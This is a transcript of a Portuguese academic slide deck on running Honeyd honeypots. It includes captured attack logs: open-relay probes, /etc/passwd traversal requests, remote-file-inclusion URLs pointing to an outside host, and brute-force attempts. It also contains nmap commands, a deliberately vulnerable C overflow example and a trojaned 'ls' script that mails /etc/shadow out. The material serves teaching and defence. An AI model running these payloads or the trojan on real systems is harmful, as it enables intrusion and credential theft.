uso de honeypots com honeyd
DESCRIPTION
Trabalho sobre a implementação de Honeypots recorrendo ao HoneydTRANSCRIPT
Uso de HoneyPots com o Honeyd
Pedro Pereira Ulisses Costa
Criptografia e Seguranca de Sistemas de Informacao
18 de Dezembro de 2008
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
O que sao HoneyPot’s?
Programas que emulam vulnerabilidades conhecidas
Armadilhas para detectar ou impedir ataques
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Tipos de HoneyPot’s
Personalidade
Alta interaccao (high-interaction)Baixa interaccao (low-interaction)
Modus operandi
ServidorCliente
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Honeyd
Criacao de hosts virtuais
Configuracao dos hosts
Suporte para mais de 1000 personalidades
Muitas dezenas de scripts para emulacao de servicos
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Configuracao do Honeyd
bash > farpd 192.168.1.50 -i eth0
# File: /etc/defaults/honeyd
# Defaults for honeyd initscript
# Correr como deamon
RUN="yes"
# Interface de rede onde o honeyd vai escutar pedidos
INTERFACE ="eth0"
# Rede que o honeyd simula
NETWORK =192.168.1.50
# Conjunto de opcoes
# -c hostname:port:username:password
OPTIONS="-c localhost :12345: username:password"
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
O comando -c hostname:port:username:password
Geracao de estatısticas parciais do Honeyd
bash > honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port\
--spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country
\
-f /etc/honeypot/honeydstats.conf -l localhost -p 12345
# File: /etc/honeypot/honeydstats.conf
# Ficheiro de configuracao do honeydstats
username:password
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Configuracao do HoneyPot(1/2)
# File: /etc/honeypot/honeyd.conf
# Configuracao do honeypot
create win2k
set win2k personality "Microsoft Windows 2000 SP2"
set win2k default tcp action reset
set win2k default udp action reset
set win2k default icmp action block
set win2k uptime 3567
add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc
$sport $ipdst $dport"
add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7 .0/ telnetd
.sh"
add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange -smtp.sh
$ipsrc $sport $ipdst $dport"
add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc
$sport $ipdst $dport"
add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange -pop3.
sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange -imap.
sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc
$sport $ipdst $dport"
add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc
$sport $ipdst $dport"
add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake -
snmp.pl\
public private --config=scripts/unix/general"
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Configuracao do HoneyPot(2/2)
add win2k udp port 137 proxy $ipsrc :137
add win2k udp port 138 proxy $ipsrc :138
add win2k udp port 445 proxy $ipsrc :445
add win2k tcp port 137 proxy $ipsrc :137
add win2k tcp port 138 proxy $ipsrc :138
add win2k tcp port 139 proxy $ipsrc :139
add win2k tcp port 445 proxy $ipsrc :445
bind 192.168.1.50 win2k$
Impossıvel monitorizar portos NETBIOS
Grade complexidade
Decisao reencaminhar para source
Inicializar o nosso HoneyPot:
bash > /etc/init.d/honeyd start
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Ficheiros
/var/log/honeyd.txt SMTP, Telnet, IMAP, POP3
/var/log/honeypot/web.log HTTP
/var/log/honeypot/honeyd.log Log principal do Honeyd
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Formato do ficheiro /var/log/honeypot/honeyd.log
Data Protocolo T IPOrig PortOrig IPDst PortDst Info Commentario. . . tcp(6) S 88.44.123.210 3637 . . . 139 [Windows XP SP1]. . . tcp(6) S 82.155.0.49 22617 . . . 139. . . tcp(6) E 82.155.1.160 4399 . . . 445: 0 0. . . tcp(6) - 82.155.122.18 61582 . . . 139: 40 R. . . icmp(1) - 80.236.5.27 . . . : 3(13): 56. . . tcp(6) - 82.154.64.174 34507 . . . 445: 40 RA. . . tcp(6) - 124.8.74.33 1806 . . . 25: 70 FPA [Windows XP SP1]. . . tcp(6) - 168.167.152.228 58274 . . . 445: 52 FA [Windows XP SP1]. . . tcp(6) - 168.167.152.228 58274 . . . 445: 52 FA. . . tcp(6) - 82.155.57.245 58274 . . . 445: 52 PA [Windows XP SP1]. . . tcp(6) - 193.136.19.149 58274 . . . 445: 52 PA. . . tcp(6) - 88.175.73.149 4332 . . . 139: 40 R [Windows XP SP1]. . . tcp(6) - 82.155.137.139 1230 . . . 445: 40 A [Windows XP SP1]. . . tcp(6) - 82.155.7.176 2794 . . . 445: 40 A. . . tcp(6) - 82.155.116.238 3578 . . . 23: 60 S [Linux 2.6 .1-7]. . . tcp(6) - 124.207.41.198 48804 . . . 23: 40 S. . . udp(17) - 192.168.1.254 67 . . . 68: 298
Data no formato: 2008-12-15-22:59:03.4039
IPDst e sempre o mesmo (neste caso) - 192.168.1.50
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Formato do ficheiro /var/log/honeypot/honeyd.log
2009 -01 -01 -05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009 -01 -01 -05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
Para TCP e UDP nao sao gravadas todas as transmissoes depacotes
Seria demasiando verboso
Apenas a quantidade transmitida
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SMTP
Usado do lado do servidor para enviar mensagens
Para receber usams POP3 ou IMAP
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SMTP - HoneyPot
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Comando EHLO em SMTP
Comando para identificar clientes
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Comando EHLO em SMTP
S: 220 bps -pc9.local.mynet Microsoft ESMTP MAIL Service , Version: 5.0.2195.5329
ready at Sex Jan 9 22:10:11 WET 2009
C: EHLO windows
S: 250-bps -pc9.local.mynet Hello [12]
S: 250-TURN
S: 250-ATRN
S: 250-SIZE
S: 250-ETRN
S: 250- PIPELINING
S: 250-DSN
S: 250- ENHANCEDSTATUSCODES
S: 250-8 bitmime
S: 250- BINARYMIME
S: 250- CHUNKING
S: 250-VRFY
S: 250-X-EXPS GSSAPI NTLM LOGIN
S: 250-X-EXPS=LOGIN
S: 250-AUTH GSSAPI NTLM LOGIN
S: 250-AUTH=LOGIN
S: 250-X-LINK2STATE
S: 250- XEXCH50}
S: 250 OK
Identificacao por nomes de dominios nao reais
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Spamm em servidores SMTP
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Solucoes
EHLO [host]
verificar se resolvem
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Ataques
HELO 82.155.248.223
MAIL FROM:<[email protected] >
RCPT TO:<[email protected] >
DATA
Subject: Super webscan open relay check succeded , hostname = 82.155.248.223
2008 -12 -11 -09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows
XP SP1]
2008 -12 -11 -09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Ataques
HELO 82.155.251.32
MAIL FROM:<[email protected] >
RCPT TO:<[email protected] >
DATA
Subject: Super webscan open relay check succeded , hostname = 82.155.251.32
2008 -12 -23 -12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP
SP1]
2008 -12 -23 -12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP
SP1]
2008 -12 -23 -12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
2008 -12 -23 -12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
2008 -12 -23 -12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP
SP1]
2008 -12 -23 -12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
2008 -12 -23 -14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP
SP1]
2008 -12 -23 -14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP
SP1]
2008 -12 -23 -14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
2008 -12 -23 -14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Ataques
HELO 82.155.103.147
MAIL FROM: <[email protected] >
RCPT TO: <[email protected]>
DATA
Received: from ([145.200.201.114])
by 82.155.103.147 id <9624303 -98482 >;
Tue , 06 Jan 2009 21:16:04 -0100
Message -ID: <w58\$6a4j1fqc6q@ocjc8ujvz >
From: "" <[email protected]>
To: <[email protected]>
Subject: BC_82 .155.103.147
Date: Tue , 06 Jan 09 21:16:04 GMT
MIME -Version: 1.0
Content -Type: multipart/alternative;
boundary="----= _NextPart_000_000D_01C2CC60 .49 F4EC70"
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
HTTP hit’s
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
User agent: webcollage/1.135a
--MARK --,"Mon Dec 15 23:09:00 WET 2008" ," IIS/HTTP
" ,"92.240.68.152" ,"192.168.1.50" ,56886 ,80 ,
"GET http ://www.morgangirl.com/pics/land/land1.jpg HTTP /1.0
User -Agent: webcollage /1.135a
Referer: http :// random.yahoo.com/fast/ryl
Host: www.morgangirl.com
",
--ENDMARK --
Tentativa de obter uma imagem atraves do HoneyPot
HoneyPotpode ter sido “visto” por um proxy scanner
HoneyPot como um proxy aberto
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Directory traversal
Tambem conhecido como dot dot slash attack (../)
Explora a insuficiencia de validacao de pedidos
Ficheiros do sistema
GET ../../../../../../../../../../ etc/passwd HTTP /1.1
--MARK --,"Sun Jan 4 05:20:57 WET 2009" ," IIS/HTTP
" ,"82.173.198.254" ,"192.168.1.50" ,59706 ,80 ,
"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E
%2E%2F%2E%2E%2Fetc%2 Fpasswd HTTP /1.1
User -Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK --
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Directory traversal
GET .../../../../../../../../../../ etc/passwd HTTP /1.1
--MARK --,"Sun Jan 4 05:20:58 WET 2009" ," IIS/HTTP
" ,"82.173.198.254" ,"192.168.1.50" ,59711 ,80 ,
"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F
%2E%2E%2F%2E%2E%2Fetc%2 Fpasswd HTTP /1.1
User -Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK --
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Directory traversal
GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/ etc\/ passwd HTTP /1.1
--MARK --,"Sun Jan 4 05:21:02 WET 2009" ," IIS/HTTP
" ,"82.173.198.254" ,"192.168.1.50" ,59727 ,80 ,
"
GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E
%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2 Fpasswd HTTP /1.1
User -Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK --
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Directory traversal
GET ..\..\..\..\..\..\..\..\..\..\ etc\passwd HTTP /1.1
--MARK --,"Sun Jan 4 05:21:04 WET 2009" ," IIS/HTTP
" ,"82.173.198.254" ,"192.168.1.50" ,59740 ,80 ,
"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E
%2E%5C%2E%2E%5Cetc%5 Cpasswd HTTP /1.1
User -Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK --
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Directory traversal
GET //etc/passwd HTTP /1.1
--MARK --,"Sun Jan 4 05:20:59 WET 2009" ," IIS/HTTP
" ,"82.173.198.254" ,"192.168.1.50" ,59700 ,80 ,
"GET %2F%2Fetc%2 Fpasswd HTTP /1.1
User -Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK --
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Conclusao
No HoneyPot nao foi bem sucedido
Sistema de baixa interactividade
No nosso HoneyPot erro 302 Object moved
Utilizacao de NMap scripting engine
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Morfeus Scanner
Procura vulnerabilidades PHP
Vulnerabilidades conhecidas
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Morfeus Scanner - WebCalendar
Criacao de calendarios online
Vulnerabilidade no ficheiro send reminder.php
--MARK --,"Wed Dec 24 16:07:29 WET 2008" ," IIS/HTTP
" ,"74.52.10.34" ,"192.168.1.50" ,54941 ,80 ,
"GET /webcalendar/tools/send_reminders.php?noSet =0& includedir=http
://217.20.172.129/ twiki/a.gif?/ HTTP /1.1
Accept: */*
Accept -Language: en -us
Accept -Encoding: gzip , deflate
User -Agent: Morfeus Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK --
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Morfeus Scanner - Mambo Joomla
CMS’s muito conhecido
O atacante pretende definir a variavelmosConfig absolute path do ficheiro index.php
--MARK --,"Wed Dec 24 16:07:34 WET 2008" ," IIS/HTTP
" ,"74.52.10.34" ,"192.168.1.50" ,55438 ,80 ,
"GET /shop/index.php?option=com_registration&task=register // boutique/index2.php?
_REQUEST =& _REQUEST %5 boption %5d=com_content&_REQUEST %5 bItemid %5d=1& GLOBALS =&
mosConfig_absolute_path=http ://217.20.172.129/ twiki/a.gif?/ HTTP /1.1
Accept: */*
Accept -Language: en -us
Accept -Encoding: gzip , deflate
User -Agent: Morfeus Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK --
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Prevenir ataques do Morfeus Scanner
Uma maneira de bloquear este tipo de ataques vindos do MFS eadicionar as seguintes linhas de codigo no ficheiro “.htaccess” napasta do website.
# Start of .htaccess change.
RewriteEngine On
RewriteCond %{ HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
# End of .htaccess change.
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Tentativa de brute force no servidor POP3
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Tentativa de brute force no servidor POP3
...
--MARK --,"Mon Dec 22 11:34:48 WET 2008" ," exchange/POP3
" ,"91.189.83.181" ,"192.168.1.50" ,54678 ,110 ,
"USER root
PASS root
",
--ENDMARK --
--MARK --,"Mon Dec 22 11:34:49 WET 2008" ," exchange/POP3
" ,"91.189.83.181" ,"192.168.1.50" ,54729 ,110 ,
"USER root
PASS root1
",
--ENDMARK --
--MARK --,"Mon Dec 22 11:34:50 WET 2008" ," exchange/POP3
" ,"91.189.83.181" ,"192.168.1.50" ,54731 ,110 ,
"USER staff
PASS staff
",
--ENDMARK --
--MARK --,"Mon Dec 22 11:34:52 WET 2008" ," exchange/POP3
" ,"91.189.83.181" ,"192.168.1.50" ,54774 ,110 ,
"USER root
PASS 12345
",
--ENDMARK --
--MARK --,"Mon Dec 22 11:34:53 WET 2008" ," exchange/POP3
" ,"91.189.83.181" ,"192.168.1.50" ,54774 ,110 ,
"USER www
PASS www
",
--ENDMARK --
...
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH
Aqui esta um grafico que mostra as tentativas de usernames:
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH
E o seguinte grafico mostra as tentativas de passwords:
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Sumario
1 IntroducaoHoneyPot’sHoneyd
2 LogLog principal do Honeyd
3 SMTPOpen mail relay
4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner
WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner
Ataque ao POP3SSH
5 A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
A ameaca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Port scanning
Descobrir maquinas e respectivos portos
Criacao de pacotes personalizados
Dificil de dominar
NMap - insecure.org
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Port scanning
Open ou Accepted : A maquina enviou uma resposta a indicarque um servico esta a escutar aquele porto;
Closed, Denied ou Not Listening : A maquina enviou umaresposta a indicar que qualquer conexao no porto sera negada;
Filtered, Dropped ou Blocked : Nao houve resposta por parteda maquina.
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Port scanning
Tipos de tecnicas
TCP/SYN
TCP Connect
UDP
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
TCP Connect
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Port scanning
Optimizacao
golden@golden -laptop :~$ sudo nmap -sS -sV 192.168.100.0/24
...
Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds
golden@golden -laptop :~$ sudo nmap -sS -sV -P0 192.168.100.0/24
...
Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Ataque
Forca bruta / Dicionarios
Exploracao de vulnerabilidades
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH
Porto 22
Atacado em Forca bruta / Dicionarios
cat /var/log/auth.log
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH - log
Dec 24 01:24:46 golden -laptop sshd [23906]: Invalid user oracle from
89.235.152.18
Dec 24 01:24:46 golden -laptop sshd [23906]: pam_unix(ssh:auth): check pass; user
unknown
Dec 24 01:24:46 golden -laptop sshd [23906]: pam_unix(ssh:auth): authentication
failure; logname= uid=0 euid=0 tty=ssh ruser= rhost =89.235.152.18
Dec 24 01:24:48 golden -laptop sshd [23906]: Failed password for invalid user
oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden -laptop sshd [23908]: reverse mapping checking getaddrinfo
for 89 -235 -152 -18. adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK -
IN ATTEMPT!
Dec 24 01:26:01 golden -laptop sshd [23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 golden -laptop sshd [23963]: pam_unix(ssh:auth): check pass; user
unknown
Dec 24 01:26:01 golden -laptop sshd [23963]: pam_unix(ssh:auth): authentication
failure; logname= uid=0 euid=0 tty=ssh ruser= rhost =89.235.152.18
Dec 24 01:26:04 golden -laptop sshd [23963]: Failed password for invalid user test
from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 golden -laptop sshd [23965]: reverse mapping checking getaddrinfo
for 89 -235 -152 -18. adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK -
IN ATTEMPT!
Dec 24 01:26:21 golden -laptop sshd [23975]: Invalid user cvsuser from
89.235.152.18
Dec 24 01:26:21 golden -laptop sshd [23975]: pam_unix(ssh:auth): check pass; user
unknown
Dec 24 01:26:21 golden -laptop sshd [23975]: pam_unix(ssh:auth): authentication
failure; logname= uid=0 euid=0 tty=ssh ruser= rhost =89.235.152.18
Dec 24 01:26:22 golden -laptop sshd [23975]: Failed password for invalid user
cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 golden -laptop sshd [23977]: reverse mapping checking getaddrinfo
for 89 -235 -152 -18. adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK -
IN ATTEMPT! Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH
Defesa:
IPTablespasswords mais fortesAutenticacao RSA
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH
password mınimo de 8 caracteres
password nao triviais
combinacoes alfanumericas
mnemonica: “Um Whiskey-Cola vale 3 euros no BA!” =“UW-Cv3enBA!”
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH
http://www.passwordmeter.com/
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
SSH - Autenticacao RSA
1 Geramos o par de chaves com o comando “ssh-keygen -t rsa”.De seguida sao criados os ficheiros /.ssh/id rsa (chaveprivada) e /.ssh/id rsa.pub (chave publica)
2 Em cada maquina onde nos quisermos ligar (destino),colocamos a “id rsa.pub” gerada em /.ssh/authorized keysconcatenando o conteudo desta forma por exemplo: “catid rsa.pub >> /.ssh/authorized keys”
3 Em cada maquina de onde nos quisermos ligar (origem),colocamos a “id rsa” em /.ssh/
4 So falta desactivar o login baseado em password ao adicionara linha “PasswordAuthentication no” em /etc/ssh/sshd confige de seguida fazer restart ao daemon “sshd” atraves de“/etc/init.d/sshd restart”.
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Vulnerabilidades
Comportamento nao previsto num artefacto de software
Buffer Overflow
Input nao validado
SQL Injection
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Exploracao de vulnerabilidades
Exploit
E a designacao dada a um pedaco de codigo que serve paraexplorar falhas em aplicacoes de forma a causarem umcomportamento previamente nao antecipado nas mesmas.
#include <stdio.h>
#include <string.h>
int main(int argc , char *argv []) {
char buffer [10];
strcpy(buffer ,argv [1]);
printf(buffer);
return 0;
}
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Buffer Overflow
user@honeypot :~$ gcc exploit.c -o exploit
user@honeypot :~$ ./ exploit thisisanexploit
*** stack smashing detected ***: ./ exploit terminated
thisisanexploitAborted
Um dos mecanismos de defesa do gcc
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
ShellCode
Um conjunto de instrucoes (em codigo maquina ou nao)desenvolvidas de maneira a que possam ser injectadas numaaplicacao em tempo de execucao.
Acesso ilegal a espaco de memoria nao autorizado
Injeccao do shellcode
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
RootKits
Conjunto de programas malicionsos (trojans, backdoors
chkrootkit e rkhunter (Linux)1;
RootkitRevealer (Windows).
1Ambos disponıveis no gestor de pacotes do Ubuntu.Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Trojaned ls
#!/ bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail [email protected]" > /bin/ls
/bin/echo "/bin/ls.old" >> /bin/ls
chmod +x /bin/ls
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
Conclusao
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd